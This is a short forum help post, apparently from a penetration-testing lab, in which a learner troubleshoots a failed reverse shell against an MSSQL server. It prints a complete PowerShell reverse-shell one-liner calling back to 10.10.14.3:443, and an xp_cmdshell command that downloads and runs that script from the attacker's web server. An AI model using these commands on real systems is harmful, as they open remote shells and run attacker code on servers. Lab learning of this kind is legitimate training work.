SOLVED: Path to the payload was incorrect in web server.
Hello
I am having trouble getting a shell back for sql_svc
I have set up my nc correctly listening on 443 and establishes md mini web server on port 80. I can browse to it myself and see the file that is supposed to be picked up. I named the callback script shell.ps1 just like it suggested.
I also changed all the IPs within the PowerShell script to make sure it was calling back to my tunnel and not whatever IP was listed in the instructions “10.10.14.3”
Here is the script:
$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.3”,443);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Whenever I run the xp_cmdshell command into my SQL session it does nothing. My web server does nothing as well.
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.3/shell.ps1\“);”
I’m still learning unix basics as well, but I saved the powershell script in kali by simply naming it as shell.ps1 in Text Editor with the commands listed inside. Just like it is above. This is correct right? It should treat the file as intended on the sql Server?
Thank you in advance for the help!